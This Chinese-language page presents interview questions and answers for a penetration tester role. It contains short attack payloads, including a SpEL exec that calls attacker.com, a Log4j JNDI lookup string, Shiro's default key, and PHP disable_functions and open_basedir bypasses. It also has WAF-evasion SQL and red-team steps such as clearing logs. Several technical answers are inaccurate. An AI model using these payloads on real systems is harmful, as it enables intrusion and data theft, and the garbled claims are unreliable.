2025年滲透測試面試題總結-天融信[社招]滲透測試工程師(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

天融信[社招]滲透測試工程師

一、Java Spring Boot組件漏洞

1. CVE-2018-1270(WebSocket RCE)

2. CVE-2018-1273(Spring Data SpEL注入)

3. Actuator未授權訪問

二、Weblogic漏洞與協議利用

三、ThinkPHP+寶塔WebShell繞過

1. disable_functions繞過

2. 寶塔環境突破

四、Android四大組件安全風險

五、Shiro 550 vs 721

六、驗證碼繞過方法

七、SQL寬字節注入實例

八、HTTP 304狀態碼

九、Log4j2 Lookup風險(CVE-2021-44228)

十、滲透測試標準流程

十一、漏洞驗證雙視角

十二、護網實戰工作清單

十三、云WAF對抗技術

1. 定位云WAF真實IP

2. SQL注入繞過示例

十四、命令注入繞過寶塔限制

十五、溯源技術框架

十六、安全設備實戰經驗

十七、網絡問題排查步驟

十八、WAF繞過技術矩陣

十九、寶塔WAF繞過方案

1. SQL注入繞過

2. 文件讀取繞過

二十、云WAF定位技術

1. IP定位

2. 歷史記錄分析

二十一、云WAF SQL注入繞過

繞過原理:

二十二、命令注入突破寶塔限制

1. open_basedir繞過

2. disable_functions繞過

天融信[社招]滲透測試工程師

1. **Java Spring Boot 組件及其漏洞**- **Spring Websocket RCE (CVE-2018-1270)**:此漏洞存在于Spring-messaging模塊的WebSocket實現中,允許攻擊者通過發送特定消息至內存中的STOMP代理,進而導致遠程代碼執行(RCE)。- **Spring Data RCE (CVE-2018-1273)**:該漏洞源于SpEL表達式注入,攻擊者可通過注入惡意SpEL表達式,在Spring Data組件中執行任意命令。- **Spring Data REST RCE (CVE-2017-8046)**:Spring Data REST暴露的對象可通過URL操控,攻擊者通過精心構造的JSON數據傳遞給服務器,從而在服務器上執行任意Java代碼。- **Spring Boot 目錄遍歷 (CVE-2021-21234)**:Spring Boot Actuator中的logview功能因未能充分校驗基本文件夾參數而導致目錄遍歷漏洞,攻擊者可借此訪問超出日志記錄基目錄以外的文件。- **Spring Actuator 未授權訪問**: 若Spring Boot應用中的Actuator端點配置不當,可能導致敏感信息泄露、XML外部實體注入(XXE)、甚至RCE等安全風險。
2.  **Weblogic常見漏洞及IIOP/T3協議** 
3. **ThinkPHP結合寶塔環境的WebShell繞過方法** - disable_function插件繞過: 攻擊者可能會利用某些方式繞過disable_function的安全限制來上傳并執行WebShell。
4. **Android測試中與Web測試相關的四大組件**- **Activity、ContentProvider、BroadcastReceiver、Service**
5. **Shiro 550與721漏洞區別**- **Shiro-550**:主要涉及Shiro rememberMe功能的反序列化漏洞,由于默認加密密鑰硬編碼,攻擊者可構造惡意對象序列化后放入Cookie,從而在服務器端執行惡意代碼。- **Shiro-721**:相較于550,Shiro在此版本中對rememberMe字段使用AES-128-CBC加密,但仍存在 Padding Oracle攻擊的可能性,攻擊者可以構造惡意Payload實現反序列化攻擊。盡管key不再是硬編碼,但仍然是動態生成并在登錄后用于生成惡意rememberMe Cookie。
6. 驗證碼繞過方法 
7. 邏輯漏洞示例 
8. SQL注入中的寬字節注入概念與實例 
9.  HTTP狀態碼304及其在協商緩存中的作用 
10. Log4j2框架下Lookup服務引發的安全風險 
11. Fastjson反序列化漏洞原理與利用手法 
12. 滲透測試的整體思路 
13.  如何驗證漏洞報告的真實性(包括運維與滲透測試角度) 
14. 描述護網經歷中完成的具體工作內容 
15. 溯源經歷分享 
16. 接觸過的安全設備及是否有實際操作經驗 
17. 對于客戶反映的網絡訪問問題排查步驟 
18.  WAF繞過的一系列思路,包括但不限于SQL注入、正則繞過、編碼方式繞過、Content-Type篡改、Unicode繞過等 
19. 特定場景下繞過寶塔WAF的方法 
20. 尋找云WAF部署位置的思路 
21. SQL注入針對云WAF的繞過技術 
22. 命令注入繞過方法,尤其是在寶塔環境中應對open_basedir和disable_functions限制的手法 

一、Java Spring Boot組件漏洞

1. CVE-2018-1270(WebSocket RCE)
  • 原理:STOMP消息頭selector參數未過濾SpEL表達式
    httpCONNECT selector: T(java.lang.Runtime).getRuntime().exec('curl attacker.com') 
  • 影響版本:Spring Framework 5.0.0 - 5.0.5
  • 修復:升級至≥5.0.6,配置@EnableWebSocketMessageBroker時添加.setSelectorHeaderEnabled(false)
2. CVE-2018-1273(Spring Data SpEL注入)
  • 攻擊路徑
    POST /users?name[#this.getClass().forName("java.lang.Runtime").exec("id")]=test
  • 防御:全局過濾#{}${}符號,禁用@Query中的SpEL解析
3. Actuator未授權訪問
  • 風險端點
    /actuator/env(泄露環境變量)
    /actuator/heapdump(獲取內存敏感數據)
  • 加固方案
    yamlmanagement: endpoints: web: exposure: include: health,info # 僅開放安全端點 endpoint: shutdown: enabled: false 

二、Weblogic漏洞與協議利用

漏洞協議利用手法修復方案
CVE-2020-2551IIOPJNDI注入ldap://惡意地址關閉7002端口
CVE-2019-2725T3繞過黑名單加載惡意類限制T3協議訪問(7001)
CVE-2017-10271HTTPXMLDecoder反序列化<object>標簽刪除wls-wsat.war 組件

三、ThinkPHP+寶塔WebShell繞過

1. disable_functions繞過
php// 利用FFI執行命令(PHP≥7.4) $ffi = FFI::cdef("int system(const char *command);"); $ffi->system("id > /tmp/output");
2. 寶塔環境突破
  • open_basedir繞過
    phpmkdir('/tmp/bypass'); chdir('/tmp/bypass'); ini_set('open_basedir','..'); // 向上穿越目錄 
  • WAF規則繞過
    union/*%0a*/select → 換行符分割檢測規則

四、Android四大組件安全風險

組件攻擊場景防御方案
Activity導出組件未鑒權(android:exported=true)顯式設置exported="false"
ContentProviderURI路徑遍歷(content://com.example.DBProvider/../etc/passwd )啟用pathPermissions校驗
BroadcastReceiver惡意消息偽造(Intent攜帶敏感數據)使用LocalBroadcastManager
Service未授權啟動(startService未校驗)添加自定義權限檢查

五、Shiro 550 vs 721

特性Shiro-550Shiro-721
密鑰機制硬編碼(默認kPH+bIxk5D2deZiIxcaaaA==動態生成(需捕獲合法Cookie)
加密方式AES-CBC弱加密AES-CBC + Padding Oracle攻擊
利用工具shiro-exploit.jar 一鍵化利用需配合Burp Collaborator

六、驗證碼繞過方法

  1. OCR識別:Tesseract識別簡單圖形碼(成功率>80%)
  2. 接口重放:未綁定Session的驗證碼請求(/captcha?t=timestamp
  3. 邏輯缺陷:響應包返回驗證結果(如{"code":0,"captcha_valid":true}
  4. 短信轟炸:攔截驗證碼請求至攻擊者手機(Burp Repeater重放)

七、SQL寬字節注入實例

  • 漏洞場景:MySQL + GBK編碼
  • 攻擊輸入
    id=1%df' AND 1=1-- → 轉義后:1%df\' → GBK解碼為1運'
  • 防御方案
    java// 強制UTF-8編碼 new String(request.getParameter("id").getBytes("ISO-8859-1"), "UTF-8");

八、HTTP 304狀態碼

  • 協商緩存機制
    httpGET /logo.jpg HTTP/1.1 If-Modified-Since: Wed, 01 Jun 2025 07:28:00 GMT HTTP/1.1 304 Not Modified // 資源未變更,使用本地緩存 
  • 安全風險:緩存投毒(Cache Poisoning)篡改304響應頭注入惡意腳本

九、Log4j2 Lookup風險(CVE-2021-44228)

  • 攻擊原理
    ${jndi:ldap://attacker.com/Exploit} 觸發JNDI注入
  • 應急方案
    1. 升級Log4j至≥2.17.0
    2. 添加JVM參數:-Dlog4j2.formatMsgNoLookups=true

十、滲透測試標準流程

mermaidgraph TD A[信息收集] --> B[漏洞掃描] B --> C{是否可利用?} C -->|是| D[漏洞利用] C -->|否| A D --> E[權限提升] E --> F[橫向移動] F --> G[痕跡清理]

十一、漏洞驗證雙視角

驗證方式運維視角滲透視角
環境復現Docker容器隔離測試VMware快照還原
分析工具Wireshark抓包分析流量特征Burp Suite Intruder模塊爆破
無害化驗證DNS外帶(ceye.io )執行ping 127.0.0.1

十二、護網實戰工作清單

紅隊任務

  1. 魚叉攻擊:偽造HR郵件投遞Excel 4.0宏病毒
  2. 橫向移動:利用PrintNightmare(CVE-2021-34527)獲取域控權限
  3. 痕跡清理:使用mimikatz清除日志
    藍隊任務
  • 部署EDR實時阻斷可疑進程(如Carbon Black)
  • 分析NetFlow流量檢測異常IIOP/T3連接

十三、云WAF對抗技術

1. 定位云WAF真實IP
  • 查詢歷史DNS記錄:securitytrails.com
  • 全球Ping掃描:fofa.info 搜索header="X-Cache: HIT"
2. SQL注入繞過示例
sql/* 阿里云WAF繞過 */ SELECT/*!50000+0*/user,password FROM users WHERE id=1 

十四、命令注入繞過寶塔限制

bash# 繞過open_basedir mkdir -p /tmp/dir; cd /tmp/dir; chroot . # 繞過disable_functions /???/??t /???/p??sw? # 等價于 /bin/cat /etc/passwd 

十五、溯源技術框架

mermaidgraph LR A[攻擊線索] --> B[IP溯源] A --> C[樣本分析] B --> B1[威脅情報平臺:VirusTotal] C --> C1[沙箱動態分析:Any.Run] B1 --> D[攻擊者畫像] C1 --> D 

十六、安全設備實戰經驗

設備類型操作經驗應用場景
WAF策略配置/日志分析攔截SQL注入/CC攻擊
EDR進程溯源/威脅狩獵檢測勒索軟件
NGFW策略優化/IPS調優阻斷C2通信

十七、網絡問題排查步驟

mermaidgraph TD A[用戶反饋] --> B[鏈路測試] B --> C{是否通?} C -->|是| D[服務端口檢測] C -->|否| H[檢查本地DNS] D --> E{端口開放?} E -->|是| F[應用日志分析] E -->|否| G[防火墻策略檢查]

十八、WAF繞過技術矩陣

類型方法案例
SQL注入Unicode編碼:%u0055NION%u0053%u0045%u004c%u0045%u0043%u0054
正則繞過換行符分割:union%0aall%0aselect繞過union\s+select規則
Content-Type篡改表單轉文件上傳:Content-Type: multipart/form-data繞過JSON參數檢查

十九、寶塔WAF繞過方案

1. SQL注入繞過
sqlSELECT/*bt*/user FROM users # 注釋符干擾規則 
2. 文件讀取繞過
httpGET /static/%2e%2e/etc/passwd HTTP/1.1 # URL編碼繞過路徑檢測 

二十、云WAF定位技術

1. IP定位
bash# 真實IP發現 dig +short target.com A # 云WAF IP dig +short target.com TXT # 查詢SPF記錄中的真實IP 
2. 歷史記錄分析
  • 工具:securitytrails.com
  • 關鍵詞:historical DNS records

二十一、云WAF SQL注入繞過

sql/* 騰訊云WAF繞過 */ x=1+union/*!00000all*/select 1,2,3 
繞過原理:

利用MySQL版本特性注釋/*!50000*/中的數字大于真實版本號(如MySQL 5.7用/*!60000*/


二十二、命令注入突破寶塔限制

1. open_basedir繞過
ph<?php mkdir('/tmp/exp'); chdir('/tmp/exp'); ini_set('open_basedir','..'); // 目錄穿越 chdir('..'); chdir('..'); readfile('/etc/passwd'); ?>
2. disable_functions繞過
bash# LD_PRELOAD劫持 echo '<?php putenv("LD_PRELOAD=/tmp/hack.so"); mail("","","",""); ?>' > shell.php 

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/83022.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/83022.shtml
英文地址,請注明出處:http://en.pswp.cn/web/83022.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

華為OD機考-內存冷熱標記-多條件排序

import java.util.*;public class DemoTest5 {public static void main(String[] args) {Scanner in new Scanner(System.in);// 注意 hasNext 和 hasNextLine 的區別while (in.hasNextLine()) { // 注意 while 處理多個 caseint a in.nextInt();int[] arr new int[a];for(int…

PPT轉圖片拼貼工具 v3.0

軟件介紹 這個軟件就是將PPT文件轉換為圖片并且拼接起來。 這個代碼支持導入單個文件也支持導入文件夾 但是目前還沒有解決可視化界面問題。 效果展示 軟件源碼 import os import re import win32com.client from PIL import Image from typing import List, Uniondef con…

NLP學習路線圖(三十):微調策略

在自然語言處理領域,預訓練語言模型(如BERT、GPT、T5)已成為基礎設施。但如何讓這些“通才”模型蛻變為特定任務的“專家”?微調策略正是關鍵所在。本文將深入剖析七種核心微調技術及其演進邏輯。 一、基礎概念:為什么需要微調? 預訓練模型在海量語料上學習了通用語言表…

講述我的plc自學之路 第十三章

我和lora都是那種理想主義者&#xff0c;這是我們的共同之處。但是lora比我要更文藝一些&#xff0c;她讀的書畢竟比我多&#xff0c;上的又是名校。受北大人文氣息的熏陶&#xff0c;她總是對愛情充滿了太多幻想。 “說說你的過往吧&#xff0c;lora。”我給lora倒了一杯啤酒&…

GPU虛擬化

引言 現有如下環境&#xff08;注意相關配置&#xff1a;只有一個k8s節點&#xff0c;且該節點上只有一張GPU卡&#xff09;&#xff1a; // k8s版本 $ kubectl version Client Version: version.Info{Major:"1", Minor:"22", GitVersion:"v1.22.7&…

【免費數據】2005-2019年我國272個地級市的旅游競爭力多指標數據(33個指標)

旅游業是一個城市的重要產業構成。旅游競爭力是一個城市競爭力的重要構成部分。一個城市的旅游競爭力反映了其在旅游市場競爭中的比較優勢。 今日我們分享的是2005-2019年我國272個地級市的旅游競爭力多指標數據&#xff01;該數據集源自2025年4月發表于《地理學報》的論文成果…

AI智能驅動瀏覽器工具Browser Use詳解

前言 在之前關于 AI 測試相關的幾篇文章中,我們分別介紹了通過 playwright-mcp,以及 midscene.js、magentic ui 等幾個不同的 AI 瀏覽器工具,實現 AI 驅動自動化測試的方法介紹。而其實在這些不斷涌現的新工具出現之前,還有一個更早推出(2024.11),也同樣還在不斷完善的…

新成果:GaN基VCSEL動態物理模型開發

作為高速數據傳輸與光電信號處理的核心器件&#xff0c;垂直腔面發射激光器&#xff08;VCSEL&#xff09;在高速光通信、激光雷達等領域應用廣泛&#xff0c;其動態特性直接關聯器件調制速率及穩定性等關鍵參數。近期&#xff0c;天津賽米卡爾科技有限公司技術團隊開發了GaN基…

嵌入式學習筆記 - freeRTOS xTaskResumeAll( )函數解析

第一部分 移除掛起等待列表中的任務 while( listLIST_IS_EMPTY( &xPendingReadyList ) pdFALSE )//循環尋找直到為空&#xff0c;把全部任務掃描一遍 { pxTCB ( TCB_t * ) listGET_OWNER_OF_HEAD_ENTRY( ( &xPendingR…

大數據+智能零售:數字化變革下的“智慧新零售”密碼

大數據+智能零售:數字化變革下的“智慧新零售”密碼 大家好,今天咱們聊聊一個火到不行的話題:大數據在智能零售中的應用。這個領域,不僅是技術的“硬核戰場”,更是商業創新的風口浪尖。誰能玩轉數據,誰就能掌控消費者心智,實現銷售爆發。 咱們不搞枯燥學術,而是用最“…

react 常見的閉包陷阱深入解析

一、引子 先來看一段代碼,你能說出這段代碼的問題在哪嗎? const [count, setCount] = useState(0); useEffect(() => {const timer = setTimeout(() => {setCount(count + 1);}, 1000);return () => clearTimeout(timer); }, []);正確答案: 這段代碼存在閉包陷阱…

零基礎在實踐中學習網絡安全-皮卡丘靶場(第十五期-URL重定向模塊)

本期內容和之前的CSRF&#xff0c;File inclusion有聯系&#xff0c;復習后可以更好了解 介紹 不安全的url跳轉 不安全的url跳轉問題可能發生在一切執行了url地址跳轉的地方。如果后端采用了前端傳進來的(可能是用戶傳參,或者之前預埋在前端頁面的url地址)參數作為了跳轉的目…

Python訓練營---DAY48

DAY 48 隨機函數與廣播機制 知識點回顧&#xff1a; 隨機張量的生成&#xff1a;torch.randn函數卷積和池化的計算公式&#xff08;可以不掌握&#xff0c;會自動計算的&#xff09;pytorch的廣播機制&#xff1a;加法和乘法的廣播機制 ps&#xff1a;numpy運算也有類似的廣播機…

什么是ANSYS ACT? ACT又可以分為哪幾類?

ANSYS作為目前仿真界主流軟件之一&#xff0c;除了給用戶提供其強大的功能之外&#xff0c;還給用戶提供了高度自定義定制的權限。所謂定制&#xff0c;也即用戶可以根據自己仿真需求修改現有功能并展示全新功能的產品內操作。定制的目標是改變現有的用戶體驗&#xff0c;以滿足…

電路圖識圖基礎知識-電動機正反轉控制電路詳解(二十)

1. 轉換開關手動正反轉控制電路 轉換開關&#xff08;QS&#xff09;又稱倒順開關&#xff0c;是一種手動控制裝置&#xff0c;可切換電動機的旋轉方向。它具有三個工作位置&#xff1a;正向、停止和反向。 工作原理&#xff1a; 閉合總電源開關 QS若需正向運轉&#xff0c;將…

Spring Boot微服務架構(十):Docker與K8S部署的區別

Spring Boot微服務在Docker與Kubernetes&#xff08;K8S&#xff09;中的部署存在顯著差異&#xff0c;主要體現在技術定位、管理能力、擴展性及適用場景等方面。以下是兩者的核心區別及實踐對比&#xff1a; 一、技術定位與核心功能 Docker 功能&#xff1a;專注于單節點容器化…

性能剖析:在 ABP 框架中集成 MiniProfiler 實現性能可視化診斷

&#x1f680; 性能剖析&#xff1a;在 ABP 框架中集成 MiniProfiler 實現性能可視化診斷 &#x1f4da; 目錄 &#x1f680; 性能剖析&#xff1a;在 ABP 框架中集成 MiniProfiler 實現性能可視化診斷一、為什么選擇 MiniProfiler&#xff1f; &#x1f9d0;二、集成 MiniProf…

ESP32 在Arduino開發環境中,如果程序運行報錯如何定位程序報錯是哪行代碼

在開發中&#xff0c;我們常常會遇到編譯正常&#xff0c;但是運行過程中程序報錯&#xff0c;然后重啟&#xff0c;在這種情況下&#xff0c;又沒法知道是哪段程序引起的&#xff0c;現在我們就來解決這個問題。 其實ESP32的SDK中已經附帶這些debug的工具了。 首先如果我們程…

Python 包管理器 uv 介紹

Python 包管理器 uv 全面介紹 uv 是由 Astral&#xff08;熱門工具 Ruff 的開發者&#xff09;推出的下一代高性能 Python 包管理器和構建工具&#xff0c;用 Rust 編寫。它旨在解決傳統工具&#xff08;如 pip、virtualenv、pip-tools&#xff09;的性能瓶頸&#xff0c;同時…

win10啟動時小鍵盤燈默認不亮怎么辦

第一步&#xff0c;按winR&#xff0c;打開運行。 第二步&#xff0c;輸入regedit&#xff0c;打開注冊表。 第三步&#xff0c;在注冊表編輯器中,依次展開HKEY_ USERS --》.DEFAULT --》Control Panel --》Keyboard &#xff0c; 第四步&#xff0c;選中Keyboard 之后在右側窗…